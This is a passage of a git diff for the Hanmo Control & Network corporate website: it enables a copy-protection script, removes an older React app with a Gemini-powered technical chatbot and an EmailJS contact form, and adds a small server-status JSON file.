<h3 class="text-4xl md:text-5xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="about.title">Trusted Partner in Industrial Automation</h3> <h3 class="text-4xl md:text-5xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="about.title">Trusted Partner in Industrial Automation</h3>
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="about.p1">Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering.</p> <p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="about.p1">Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering.</p>
<p class="text-slate-500 leading-relaxed mb-12 font-light" data-i18n="about.p2">Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.</p> <p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="about.p2">Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.</p>
<div class="grid grid-cols-2 gap-6"> <div class="grid grid-cols-2 gap-6">
<div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm"> <div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm">
<div class="text-3xl font-light text-slate-900 mb-1 font-premium">ISO 9001</div> <div class="text-3xl font-light text-slate-900 mb-1 font-premium">ISO 9001</div>
@@ -558,7 +607,7 @@
<script src="assets/js/i18n.js"></script> <script src="assets/js/i18n.js"></script>
<script src="assets/js/script.js"></script> <script src="assets/js/script.js"></script>
<!-- RIGHT-CLICK & COPY PROTECTION RIGHT-CLICK & COPY PROTECTION
<script> <script>
// 우클릭 방지 // 우클릭 방지
document.addEventListener('contextmenu', function(e) { document.addEventListener('contextmenu', function(e) {
@@ -601,6 +650,6 @@
return false; return false;
} }
}); });
</script> --> </script>
</body> </body>
</html> </html>

View File

@@ -0,0 +1 @@
{"cpu_temp": "40", "nvme_temp": "33", "uptime_days": 6, "last_update": "11:54:01"}

View File

@@ -1,50 +0,0 @@
import React, { useEffect } from 'react';
import { HashRouter as Router, Routes, Route, useLocation } from 'react-router-dom';
import Header from './components/Header';
import Hero from './components/Hero';
import Services from './components/Services';
import About from './components/About';
import Contact from './components/Contact';
import Footer from './components/Footer';
import ChatBot from './components/ChatBot';
const ScrollToTop = () => {
const { pathname } = useLocation();
useEffect(() => {
window.scrollTo(0, 0);
}, [pathname]);
return null;
};
const HomePage = () => (
<>
<Hero />
<Services />
<About />
<Contact />
</>
);
const App: React.FC = () => {
return (
<Router>
<ScrollToTop />
<div className="min-h-screen flex flex-col relative">
<Header />
<main className="flex-grow">
<Routes>
<Route path="/" element={<HomePage />} />
<Route path="/services" element={<div className="pt-24"><Services /></div>} />
<Route path="/about" element={<div className="pt-24"><About /></div>} />
<Route path="/contact" element={<div className="pt-24"><Contact /></div>} />
</Routes>
</main>
<Footer />
<ChatBot />
</div>
</Router>
);
};
export default App;

View File

@@ -1,20 +0,0 @@
<div align="center">
<img width="1200" height="475" alt="GHBanner" src="https://github.com/user-attachments/assets/0aa67016-6eaf-458a-adb2-6e31a0763ed6" />
</div>
# Run and deploy your AI Studio app
This contains everything you need to run your app locally.
View your app in AI Studio: https://ai.studio/apps/drive/12rxvTk7cfpawzA-KqF6Z1AfiIdHEhLqT
## Run Locally
**Prerequisites:** Node.js
1. Install dependencies:
`npm install`
2. Set the `GEMINI_API_KEY` in [.env.local](.env.local) to your Gemini API key
3. Run the app:
`npm run dev`

View File

@@ -1,89 +0,0 @@
// ============================================================
// ★ EmailJS 설정 - 아래 3가지 값을 본인 계정으로 교체하세요 ★
// ============================================================
const EMAILJS_PUBLIC_KEY = 'HO6i369gX6X5HEXtJ';
const EMAILJS_SERVICE_ID = 'service_4ur5lqd';
const EMAILJS_TEMPLATE_ID = 'template_jp0v5qv';
// ============================================================
emailjs.init(EMAILJS_PUBLIC_KEY);
// ── Contact Form ─────────────────────────────────────────────
document.getElementById('contact-submit').addEventListener('click', function () {
const name = document.getElementById('contact-name').value.trim();
const email = document.getElementById('contact-email').value.trim();
const company = document.getElementById('contact-company').value.trim();
const message = document.getElementById('contact-message').value.trim();
const btn = document.getElementById('contact-submit');
if (!name || !email || !message) {
showStatus('error', t('contact.error.required')); return;
}
if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) {
showStatus('error', t('contact.error.email')); return;
}
btn.disabled = true;
btn.textContent = t('contact.sending');
const templateParams = {
name : name,
message : 'Email : ' + email + '\nCompany : ' + (company || 'N/A') + '\n\n' + message,
reply_to : email
};
emailjs.send(EMAILJS_SERVICE_ID, EMAILJS_TEMPLATE_ID, templateParams)
.then(function () {
showStatus('success', t('contact.success'));
document.getElementById('contact-name').value = '';
document.getElementById('contact-email').value = '';
document.getElementById('contact-company').value = '';
document.getElementById('contact-message').value = '';
})
.catch(function (error) {
console.error('EmailJS error:', error);
showStatus('error', t('contact.error.fail'));
})
.finally(function () {
btn.disabled = false;
btn.textContent = t('contact.btn');
});
});
function showStatus(type, msg) {
const status = document.getElementById('contact-status');
status.classList.remove('hidden', 'bg-green-500/20', 'text-green-400', 'bg-red-500/20', 'text-red-400');
status.classList.add(type === 'success' ? 'bg-green-500/20' : 'bg-red-500/20',
type === 'success' ? 'text-green-400' : 'text-red-400');
status.textContent = msg;
}
// ── Header scroll ────────────────────────────────────────────
const mainHeader = document.getElementById('main-header');
const brandName = document.getElementById('brand-name');
const navLinks = document.querySelectorAll('.nav-link');
window.addEventListener('scroll', () => {
if (window.scrollY > 50) {
mainHeader.classList.add('glass-effect', 'py-3');
mainHeader.classList.remove('py-6');
if (brandName) brandName.classList.replace('text-white', 'text-slate-900');
navLinks.forEach(link => link.classList.replace('text-slate-100', 'text-slate-700'));
} else {
mainHeader.classList.remove('glass-effect', 'py-3');
mainHeader.classList.add('py-6');
if (brandName) brandName.classList.replace('text-slate-900', 'text-white');
navLinks.forEach(link => link.classList.replace('text-slate-700', 'text-slate-100'));
}
});
// ── Mobile menu ───────────────────────────────────────────────
const mobileMenuBtn = document.getElementById('mobile-menu-btn');
const mobileMenu = document.getElementById('mobile-menu');
const closeMenuBtn = document.getElementById('close-menu-btn');
if (mobileMenuBtn) mobileMenuBtn.addEventListener('click', () => mobileMenu.classList.remove('translate-x-full'));
if (closeMenuBtn) closeMenuBtn.addEventListener('click', () => mobileMenu.classList.add('translate-x-full'));
const mobileNavLinks = mobileMenu ? mobileMenu.querySelectorAll('a') : [];
mobileNavLinks.forEach(link => link.addEventListener('click', () => mobileMenu.classList.add('translate-x-full')));

View File

@@ -1,57 +0,0 @@
import React from 'react';
const About: React.FC = () => {
return (
<section id="about" className="py-24 bg-slate-50">
<div className="container mx-auto px-6">
<div className="grid lg:grid-cols-2 gap-16 items-center">
<div className="order-2 lg:order-1 relative">
<div className="aspect-[4/3] md:aspect-square rounded-[2rem] overflow-hidden shadow-2xl">
<img
src="https://images.unsplash.com/photo-1504384308090-c894fdcc538d?auto=format&fit=crop&q=80&w=1000"
alt="Our Engineering Facility"
className="w-full h-full object-cover"
/>
</div>
<div className="absolute -bottom-6 -left-6 md:-bottom-10 md:-left-10 p-6 md:p-8 bg-blue-600 text-white rounded-3xl shadow-2xl max-w-[200px] md:max-w-[240px]">
<div className="text-4xl md:text-5xl font-bold mb-2">15+</div>
<div className="text-sm font-semibold opacity-90 uppercase tracking-widest leading-tight">Years of Industrial Excellence</div>
</div>
</div>
<div className="order-1 lg:order-2">
<h2 className="text-blue-600 font-bold uppercase tracking-widest text-sm mb-3">Our Identity</h2>
<h3 className="text-3xl md:text-5xl font-extrabold text-slate-900 mb-8 leading-tight">
Designing the Future of Industrial Frameworks
</h3>
<p className="text-slate-600 mb-6 text-lg leading-relaxed">
Hanmo Control & Network Co., Ltd. was established on the foundation that industrial automation must be inherently reliable, perfectly integrated, and intelligently scalable.
</p>
<p className="text-slate-600 mb-10 leading-relaxed">
As strategic partners for global leaders transitioning into Industry 4.0, our experts specialize in everything from site-wide instrumentation to enterprise-grade data management.
</p>
<div className="grid sm:grid-cols-2 gap-6">
{[
{ title: 'Reliability Focused', icon: 'fa-shield-halved' },
{ title: 'Global Standards', icon: 'fa-globe' },
{ title: '24/7 Support', icon: 'fa-clock' },
{ title: 'Custom R&D', icon: 'fa-flask' },
].map((item, i) => (
<div key={i} className="flex items-center gap-4 p-4 bg-white rounded-2xl shadow-sm border border-slate-100">
<div className="w-10 h-10 bg-blue-50 rounded-lg flex items-center justify-center text-blue-600">
<i className={`fas ${item.icon}`}></i>
</div>
<span className="font-bold text-slate-800 text-sm">{item.title}</span>
</div>
))}
</div>
</div>
</div>
</div>
</section>
);
};
export default About;

View File

@@ -1,100 +0,0 @@
import React, { useState, useRef, useEffect } from 'react';
import { chatWithExpert } from '../services/geminiService';
import { Message } from '../types';
const ChatBot: React.FC = () => {
const [isOpen, setIsOpen] = useState(false);
const [input, setInput] = useState('');
const [messages, setMessages] = useState<Message[]>([
{ role: 'model', text: "Welcome to Hanmo! I'm your Technical Assistant. How can I help you with our DCS, SCADA, or field instrument solutions today?" }
]);
const [isLoading, setIsLoading] = useState(false);
const scrollRef = useRef<HTMLDivElement>(null);
useEffect(() => {
if (scrollRef.current) {
scrollRef.current.scrollTop = scrollRef.current.scrollHeight;
}
}, [messages, isOpen]);
const handleSend = async () => {
if (!input.trim() || isLoading) return;
const userMsg = input.trim();
setInput('');
setMessages(prev => [...prev, { role: 'user', text: userMsg }]);
setIsLoading(true);
const history = messages.map(m => ({ role: m.role, text: m.text }));
const responseText = await chatWithExpert(userMsg, history);
setMessages(prev => [...prev, { role: 'model', text: responseText }]);
setIsLoading(false);
};
return (
<div className="fixed bottom-6 right-6 z-[60]">
<button
onClick={() => setIsOpen(!isOpen)}
className="w-14 h-14 md:w-16 md:h-16 bg-blue-600 hover:bg-blue-700 text-white rounded-full shadow-2xl flex items-center justify-center transition-transform hover:scale-110 active:scale-95"
>
{isOpen ? <i className="fas fa-times text-2xl"></i> : <i className="fas fa-robot text-2xl"></i>}
</button>
{isOpen && (
<div className="absolute bottom-20 right-0 w-[calc(100vw-3rem)] md:w-96 h-[500px] max-h-[70vh] bg-white rounded-3xl shadow-2xl flex flex-col overflow-hidden border border-slate-200 animate-in fade-in slide-in-from-bottom-5">
<div className="p-5 bg-blue-600 text-white font-bold flex items-center justify-between">
<div className="flex items-center gap-3">
<i className="fas fa-microchip"></i>
<span>Tech Advisor</span>
</div>
<div className="w-2 h-2 bg-green-400 rounded-full animate-pulse"></div>
</div>
<div ref={scrollRef} className="flex-1 overflow-y-auto p-5 space-y-4 bg-slate-50">
{messages.map((m, i) => (
<div key={i} className={`flex ${m.role === 'user' ? 'justify-end' : 'justify-start'}`}>
<div className={`max-w-[85%] p-4 rounded-2xl text-sm leading-relaxed ${
m.role === 'user'
? 'bg-blue-600 text-white rounded-tr-none shadow-md'
: 'bg-white text-slate-700 shadow-sm border border-slate-100 rounded-tl-none'
}`}>
{m.text}
</div>
</div>
))}
{isLoading && (
<div className="flex justify-start">
<div className="bg-white p-4 rounded-2xl border border-slate-100 rounded-tl-none flex gap-1.5 shadow-sm">
<div className="w-1.5 h-1.5 bg-blue-400 rounded-full animate-bounce"></div>
<div className="w-1.5 h-1.5 bg-blue-400 rounded-full animate-bounce [animation-delay:0.2s]"></div>
<div className="w-1.5 h-1.5 bg-blue-400 rounded-full animate-bounce [animation-delay:0.4s]"></div>
</div>
</div>
)}
</div>
<div className="p-4 bg-white border-t border-slate-100 flex gap-2">
<input
type="text"
value={input}
onChange={(e) => setInput(e.target.value)}
onKeyDown={(e) => e.key === 'Enter' && handleSend()}
placeholder="Ask a technical question..."
className="flex-1 bg-slate-100 text-sm p-3 rounded-xl outline-none focus:ring-2 focus:ring-blue-600/20"
/>
<button
onClick={handleSend}
className="bg-blue-600 hover:bg-blue-700 text-white w-12 h-12 rounded-xl flex items-center justify-center transition-colors"
>
<i className="fas fa-paper-plane"></i>
</button>
</div>
</div>
)}
</div>
);
};
export default ChatBot;

View File

@@ -1,123 +0,0 @@
import React, { useState } from 'react';
const Contact: React.FC = () => {
const [status, setStatus] = useState<'idle' | 'sending' | 'success'>('idle');
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
setStatus('sending');
setTimeout(() => setStatus('success'), 1500);
};
return (
<section id="contact" className="py-24 bg-white">
<div className="container mx-auto px-6">
<div className="max-w-6xl mx-auto bg-slate-900 rounded-[2rem] md:rounded-[3rem] overflow-hidden shadow-2xl flex flex-col lg:flex-row">
{/* Information Section */}
<div className="lg:w-5/12 p-8 md:p-16 bg-blue-600 text-white flex flex-col justify-between">
<div>
<h3 className="text-3xl md:text-4xl font-bold mb-6">Get in Touch</h3>
<p className="text-blue-100 mb-12 text-lg">
Ready to optimize your industrial infrastructure? Our engineering team is standing by to assist with your technical inquiries.
</p>
<div className="space-y-8">
<div className="flex gap-5 items-start">
<div className="w-10 h-10 bg-white/20 rounded-full flex items-center justify-center shrink-0">
<i className="fas fa-map-marker-alt"></i>
</div>
<div>
<h4 className="font-bold">Headquarters</h4>
<p className="text-blue-100 text-sm">Industrial Hub B123, Gangnam District<br />Seoul, South Korea</p>
</div>
</div>
<div className="flex gap-5 items-start">
<div className="w-10 h-10 bg-white/20 rounded-full flex items-center justify-center shrink-0">
<i className="fas fa-phone-alt"></i>
</div>
<div>
<h4 className="font-bold">Phone</h4>
<p className="text-blue-100 text-sm">+82 2-1234-5678</p>
</div>
</div>
<div className="flex gap-5 items-start">
<div className="w-10 h-10 bg-white/20 rounded-full flex items-center justify-center shrink-0">
<i className="fas fa-envelope"></i>
</div>
<div>
<h4 className="font-bold">Email</h4>
<p className="text-blue-100 text-sm">solutions@hanmocontrol.com</p>
</div>
</div>
</div>
</div>
<div className="mt-16 flex gap-4">
<a href="#" className="w-12 h-12 bg-white/10 hover:bg-white/30 rounded-full flex items-center justify-center transition-all">
<i className="fab fa-linkedin-in text-xl"></i>
</a>
<a href="#" className="w-12 h-12 bg-white/10 hover:bg-white/30 rounded-full flex items-center justify-center transition-all">
<i className="fab fa-twitter text-xl"></i>
</a>
</div>
</div>
{/* Form Section */}
<div className="lg:w-7/12 p-8 md:p-16 bg-white">
{status === 'success' ? (
<div className="h-full flex flex-col items-center justify-center text-center space-y-6">
<div className="w-24 h-24 bg-green-100 text-green-600 rounded-full flex items-center justify-center text-4xl">
<i className="fas fa-check"></i>
</div>
<h4 className="text-3xl font-extrabold text-slate-900">Inquiry Received</h4>
<p className="text-slate-500 text-lg">Thank you for reaching out. An automation consultant will review your request and contact you within 24 hours.</p>
<button
onClick={() => setStatus('idle')}
className="text-blue-600 font-bold hover:underline"
>
Send another request
</button>
</div>
) : (
<form onSubmit={handleSubmit} className="space-y-6">
<div className="grid sm:grid-cols-2 gap-6">
<div className="space-y-2">
<label className="text-xs font-bold text-slate-500 uppercase tracking-widest">Full Name</label>
<input required type="text" className="w-full bg-slate-50 border border-slate-200 p-4 rounded-xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all" placeholder="John Doe" />
</div>
<div className="space-y-2">
<label className="text-xs font-bold text-slate-500 uppercase tracking-widest">Work Email</label>
<input required type="email" className="w-full bg-slate-50 border border-slate-200 p-4 rounded-xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all" placeholder="j.doe@company.com" />
</div>
</div>
<div className="space-y-2">
<label className="text-xs font-bold text-slate-500 uppercase tracking-widest">Requirement Type</label>
<select className="w-full bg-slate-50 border border-slate-200 p-4 rounded-xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all">
<option>DCS Architecture Design</option>
<option>SCADA System Integration</option>
<option>Database & Historian Setup</option>
<option>Field Instrumentation Supply</option>
<option>Technical Support</option>
</select>
</div>
<div className="space-y-2">
<label className="text-xs font-bold text-slate-500 uppercase tracking-widest">Project Details</label>
<textarea required rows={5} className="w-full bg-slate-50 border border-slate-200 p-4 rounded-xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all" placeholder="Tell us about your technical requirements..."></textarea>
</div>
<button
disabled={status === 'sending'}
className="w-full bg-slate-900 hover:bg-blue-600 text-white font-bold py-5 rounded-xl shadow-lg transition-all active:scale-[0.98] disabled:opacity-50"
>
{status === 'sending' ? 'Processing...' : 'Submit Inquiry'}
</button>
</form>
)}
</div>
</div>
</div>
</section>
);
};
export default Contact;

View File

@@ -1,74 +0,0 @@
import React from 'react';
const Footer: React.FC = () => {
return (
<footer className="bg-slate-900 text-white pt-20 pb-10">
<div className="container mx-auto px-6">
<div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-12 mb-16">
<div className="lg:col-span-1">
<div className="flex items-center gap-3 mb-8">
<div className="bg-blue-600 w-10 h-10 rounded-lg flex items-center justify-center shrink-0 shadow-lg">
<span className="text-white font-bold text-xl font-industrial">H</span>
</div>
<div className="flex flex-col leading-none">
<span className="font-bold text-xl tracking-tight font-industrial text-white">
HANMO
</span>
<span className="text-[9px] font-bold uppercase tracking-[0.2em] mt-1 text-blue-500">
Control & Network
</span>
</div>
</div>
<p className="text-slate-400 leading-relaxed mb-8 max-w-sm">
Providing resilient, high-precision control and networking solutions for the world's most demanding industrial environments.
</p>
</div>
<div>
<h4 className="font-bold text-lg mb-6 border-b border-slate-800 pb-2 font-industrial tracking-wide">Solutions</h4>
<ul className="space-y-4 text-slate-400">
<li><a href="#" className="hover:text-blue-500 transition-colors">DCS Integration</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">SCADA Design</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Industrial Historians</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Smart Field Devices</a></li>
</ul>
</div>
<div>
<h4 className="font-bold text-lg mb-6 border-b border-slate-800 pb-2 font-industrial tracking-wide">Resources</h4>
<ul className="space-y-4 text-slate-400">
<li><a href="#" className="hover:text-blue-500 transition-colors">Technical Docs</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Case Studies</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Security Updates</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Training Portal</a></li>
</ul>
</div>
<div>
<h4 className="font-bold text-lg mb-6 border-b border-slate-800 pb-2 font-industrial tracking-wide">Connect</h4>
<div className="flex gap-4 mb-6">
<a href="#" className="w-10 h-10 rounded-xl bg-slate-800 flex items-center justify-center hover:bg-blue-600 transition-all">
<i className="fab fa-linkedin-in"></i>
</a>
<a href="#" className="w-10 h-10 rounded-xl bg-slate-800 flex items-center justify-center hover:bg-blue-600 transition-all">
<i className="fab fa-twitter"></i>
</a>
</div>
<p className="text-slate-500 text-sm">Subscribe to our newsletter for automation insights.</p>
</div>
</div>
<div className="pt-10 border-t border-slate-800 flex flex-col md:flex-row justify-between items-center gap-6 text-slate-500 text-xs uppercase tracking-widest font-bold">
<p>© 2024 Hanmo Control & Network Co., Ltd.</p>
<div className="flex gap-8">
<a href="#" className="hover:text-slate-300">Privacy Policy</a>
<a href="#" className="hover:text-slate-300">Terms & Conditions</a>
</div>
</div>
</div>
</footer>
);
};
export default Footer;

View File

@@ -1,88 +0,0 @@
import React, { useState, useEffect } from 'react';
const Header: React.FC = () => {
const [isScrolled, setIsScrolled] = useState(false);
const [isMobileMenuOpen, setIsMobileMenuOpen] = useState(false);
useEffect(() => {
const handleScroll = () => setIsScrolled(window.scrollY > 20);
window.addEventListener('scroll', handleScroll);
return () => window.removeEventListener('scroll', handleScroll);
}, []);
const navItems = [
{ name: 'Home', href: '#/' },
{ name: 'Services', href: '#/services' },
{ name: 'About', href: '#/about' },
{ name: 'Contact', href: '#/contact' },
];
return (
<header className={`fixed top-0 left-0 right-0 z-50 transition-all duration-300 ${isScrolled ? 'glass-effect shadow-md py-3' : 'bg-transparent py-6'}`}>
<div className="container mx-auto px-6 flex justify-between items-center">
<a href="#/" className="flex items-center gap-3 group">
<div className="bg-blue-600 w-10 h-10 rounded-lg flex items-center justify-center shrink-0 shadow-lg group-hover:bg-blue-700 transition-colors">
<span className="text-white font-bold text-xl font-industrial">H</span>
</div>
<div className="flex flex-col leading-none">
<span className={`font-bold text-xl tracking-tight font-industrial ${isScrolled ? 'text-slate-900' : 'text-slate-900 md:text-white'}`}>
HANMO
</span>
<span className={`text-[9px] font-bold uppercase tracking-[0.2em] mt-1 ${isScrolled ? 'text-blue-600' : 'text-blue-500'}`}>
Control & Network
</span>
</div>
</a>
{/* Desktop Nav */}
<nav className="hidden md:flex gap-8">
{navItems.map((item) => (
<a
key={item.name}
href={item.href}
className={`text-sm font-semibold hover:text-blue-600 transition-colors ${isScrolled ? 'text-slate-700' : 'text-slate-100'}`}
>
{item.name}
</a>
))}
</nav>
<div className="hidden md:block">
<button className="bg-blue-600 hover:bg-blue-700 text-white px-6 py-2 rounded-full text-sm font-bold shadow-lg transition-all active:scale-95 font-industrial tracking-wide">
REQUEST QUOTE
</button>
</div>
{/* Mobile menu toggle */}
<button
onClick={() => setIsMobileMenuOpen(!isMobileMenuOpen)}
className={`md:hidden p-2 rounded-lg transition-colors ${isScrolled ? 'text-slate-900' : 'text-slate-100'}`}
>
<i className={`fas ${isMobileMenuOpen ? 'fa-times' : 'fa-bars'} text-2xl`}></i>
</button>
</div>
{/* Mobile Menu Drawer */}
<div className={`md:hidden absolute top-full left-0 right-0 bg-white border-t border-slate-100 shadow-2xl transition-all duration-300 ${isMobileMenuOpen ? 'opacity-100 translate-y-0 visible' : 'opacity-0 -translate-y-4 invisible'}`}>
<nav className="flex flex-col p-6 space-y-4">
{navItems.map((item) => (
<a
key={item.name}
href={item.href}
onClick={() => setIsMobileMenuOpen(false)}
className="text-lg font-medium text-slate-800 hover:text-blue-600 border-b border-slate-50 pb-2"
>
{item.name}
</a>
))}
<button className="w-full bg-blue-600 text-white py-4 rounded-xl font-bold font-industrial tracking-widest">
REQUEST QUOTE
</button>
</nav>
</div>
</header>
);
};
export default Header;

View File

@@ -1,55 +0,0 @@
import React from 'react';
const Hero: React.FC = () => {
return (
<section id="home" className="relative min-h-screen flex items-center pt-20 overflow-hidden">
<div className="absolute inset-0 z-0">
<img
src="https://images.unsplash.com/photo-1581092160562-40aa08e78837?auto=format&fit=crop&q=80&w=2000"
alt="Control Room"
className="w-full h-full object-cover"
/>
<div className="absolute inset-0 bg-slate-900/80 md:bg-transparent md:bg-gradient-to-r md:from-slate-900/90 md:to-slate-900/20"></div>
</div>
<div className="container mx-auto px-6 relative z-10">
<div className="max-w-5xl">
<div className="inline-block px-4 py-1.5 mb-6 rounded-full bg-blue-600/20 border border-blue-400/30 text-blue-400 text-[10px] font-bold uppercase industrial-tracking animate-pulse font-industrial">
Next-Gen Industrial Solutions
</div>
<h1 className="text-5xl md:text-8xl font-extralight text-white mb-8 leading-[1.05] premium-kerning font-premium">
Engineering <span className="text-blue-500 font-normal">Precision</span> <br className="hidden md:block"/> for Industrial Networks
</h1>
<p className="text-lg md:text-xl text-slate-300 mb-10 leading-relaxed max-w-2xl font-premium font-light opacity-80">
Hanmo Control & Network Co., Ltd. delivers global-standard DCS and SCADA infrastructure for mission-critical industrial ecosystems and digital transformation.
</p>
<div className="flex flex-col sm:flex-row gap-4">
<a href="#services" className="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-xl font-bold shadow-xl transition-all hover:-translate-y-1 text-center font-industrial text-xs tracking-widest uppercase">
Our Expertise
</a>
<a href="#contact" className="bg-white/10 hover:bg-white/20 text-white border border-white/20 backdrop-blur-md px-8 py-4 rounded-xl font-bold transition-all text-center font-industrial text-xs tracking-widest uppercase">
Schedule Consultation
</a>
</div>
</div>
<div className="mt-20 grid grid-cols-2 lg:grid-cols-4 gap-4 md:gap-8 max-w-5xl">
{[
{ label: 'Installed Nodes', value: '1,500+' },
{ label: 'Uptime', value: '99.99%' },
{ label: 'Certified Experts', value: '60+' },
{ label: 'Years Active', value: '15' },
].map((stat, i) => (
<div key={i} className="p-6 bg-white/5 backdrop-blur-xl rounded-2xl border border-white/10 group hover:bg-white/10 transition-colors">
<div className="text-3xl md:text-4xl font-extralight text-white mb-2 font-premium premium-kerning">{stat.value}</div>
<div className="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold">{stat.label}</div>
</div>
))}
</div>
</div>
</section>
);
};
export default Hero;

View File

@@ -1,78 +0,0 @@
import React from 'react';
import { ServiceItem } from '../types';
const SERVICES: ServiceItem[] = [
{
id: 'dcs',
title: 'Distributed Control (DCS)',
description: 'Advanced, redundant control architectures designed for continuous process industries including power generation and chemicals.',
icon: 'fa-network-wired',
image: 'https://images.unsplash.com/photo-1518770660439-4636190af475?auto=format&fit=crop&q=80&w=800'
},
{
id: 'scada',
title: 'SCADA Solutions',
description: 'High-performance monitoring platforms with cutting-edge HMI, real-time analytics, and secure remote access protocols.',
icon: 'fa-chart-line',
image: 'https://images.unsplash.com/photo-1551288049-bebda4e38f71?auto=format&fit=crop&q=80&w=800'
},
{
id: 'database',
title: 'Industrial Historians',
description: 'Mission-critical database servers and SQL infrastructure optimized for heavy manufacturing data and regulatory compliance.',
icon: 'fa-database',
image: 'https://images.unsplash.com/photo-1558494949-ef010cbdcc48?auto=format&fit=crop&q=80&w=800'
},
{
id: 'instruments',
title: 'Control Instruments',
description: 'Precision field instruments including flow, pressure, and temperature transmitters and smart control valves.',
icon: 'fa-gauge-high',
image: 'https://images.unsplash.com/photo-1531482615713-2afd69097998?auto=format&fit=crop&q=80&w=800'
}
];
const Services: React.FC = () => {
return (
<section id="services" className="py-24 bg-white">
<div className="container mx-auto px-6">
<div className="text-center max-w-3xl mx-auto mb-20">
<h2 className="text-blue-600 font-bold uppercase tracking-widest text-sm mb-3">Capabilities</h2>
<h3 className="text-3xl md:text-5xl font-extrabold text-slate-900 mb-6">World-Class Automation</h3>
<p className="text-slate-600 text-lg leading-relaxed">
We bridge the gap between heavy physical operations and digital intelligence through robust networking and control systems.
</p>
</div>
<div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-8">
{SERVICES.map((service) => (
<div key={service.id} className="group flex flex-col h-full bg-slate-50 border border-slate-100 rounded-3xl overflow-hidden hover:border-blue-200 transition-all hover:shadow-2xl hover:-translate-y-2">
<div className="h-48 overflow-hidden">
<img
src={service.image}
alt={service.title}
className="w-full h-full object-cover grayscale group-hover:grayscale-0 transition-all duration-700 group-hover:scale-110"
/>
</div>
<div className="p-8 flex-grow flex flex-col">
<div className="w-12 h-12 bg-white rounded-xl shadow-sm flex items-center justify-center mb-6 group-hover:bg-blue-600 transition-colors">
<i className={`fas ${service.icon} text-blue-600 group-hover:text-white text-xl`}></i>
</div>
<h4 className="text-xl font-bold text-slate-900 mb-4">{service.title}</h4>
<p className="text-slate-600 text-sm leading-relaxed mb-8 flex-grow">
{service.description}
</p>
<a href="#" className="text-blue-600 font-bold text-sm inline-flex items-center gap-2 group-hover:gap-4 transition-all">
Technical Specs <i className="fas fa-arrow-right"></i>
</a>
</div>
</div>
))}
</div>
</div>
</section>
);
};
export default Services;

View File

@@ -1,16 +0,0 @@
import React from 'react';
import ReactDOM from 'react-dom/client';
import App from './App';
const rootElement = document.getElementById('root');
if (!rootElement) {
throw new Error("Could not find root element to mount to");
}
const root = ReactDOM.createRoot(rootElement);
root.render(
<React.StrictMode>
<App />
</React.StrictMode>
);

View File

@@ -1,7 +0,0 @@
{
"name": "Hanmo Control & Network Co., Ltd.",
"description": "Premium industrial automation solutions provider specializing in DCS, SCADA, Database Servers, and Control Instruments.",
"requestFramePermissions": [
"camera"
]
}

View File

@@ -1,23 +0,0 @@
{
"name": "hanmo-control-&-network-co.,-ltd.",
"private": true,
"version": "0.0.0",
"type": "module",
"scripts": {
"dev": "vite",
"build": "vite build",
"preview": "vite preview"
},
"dependencies": {
"react": "^19.2.4",
"react-dom": "^19.2.4",
"@google/genai": "^1.41.0",
"react-router-dom": "^7.13.0"
},
"devDependencies": {
"@types/node": "^22.14.0",
"@vitejs/plugin-react": "^5.0.0",
"typescript": "~5.8.2",
"vite": "^6.2.0"
}
}

View File

@@ -1,36 +0,0 @@
import { GoogleGenAI } from "@google/genai";
const SYSTEM_INSTRUCTION = `You are the primary AI Technical Consultant for "Hanmo Control & Network Co., Ltd.".
Hanmo is a global leader specializing in:
1. DCS (Distributed Control Systems): High-availability process automation for utility-scale industries.
2. SCADA (Supervisory Control and Data Acquisition): Real-time remote operations and monitoring.
3. Database & Historian Servers: Secure, high-speed industrial data management.
4. Precision Control Instruments: Smart sensors and actuators for flow, pressure, and thermal management.
Tone: Professional, highly technical, authoritative, and helpful.
Language: You must respond in English at all times.
Guidance: Provide expert advice on automation architecture and integration. For pricing or project-specific quotes, instruct the user to use the official contact form on the website.`;
export async function chatWithExpert(message: string, history: {role: 'user' | 'model', text: string}[]) {
try {
const ai = new GoogleGenAI({ apiKey: process.env.API_KEY || '' });
const response = await ai.models.generateContent({
model: 'gemini-3-flash-preview',
contents: [
...history.map(h => ({ role: h.role === 'user' ? 'user' : 'model', parts: [{ text: h.text }] })),
{ role: 'user', parts: [{ text: message }] }
],
config: {
systemInstruction: SYSTEM_INSTRUCTION,
temperature: 0.7,
},
});
return response.text || "I apologize, but I am unable to process your technical inquiry right now. Please try again later.";
} catch (error) {
console.error("Gemini API Error:", error);
return "Our technical advisor is currently offline. Please contact our support team directly via email.";
}
}

View File

@@ -1 +0,0 @@
{"cpu_temp": "39", "nvme_temp": "33", "uptime_days": 4, "last_update": "10:51:01"}

View File

@@ -1,29 +0,0 @@
{
"compilerOptions": {
"target": "ES2022",
"experimentalDecorators": true,
"useDefineForClassFields": false,
"module": "ESNext",
"lib": [
"ES2022",
"DOM",
"DOM.Iterable"
],
"skipLibCheck": true,
"types": [
"node"
],
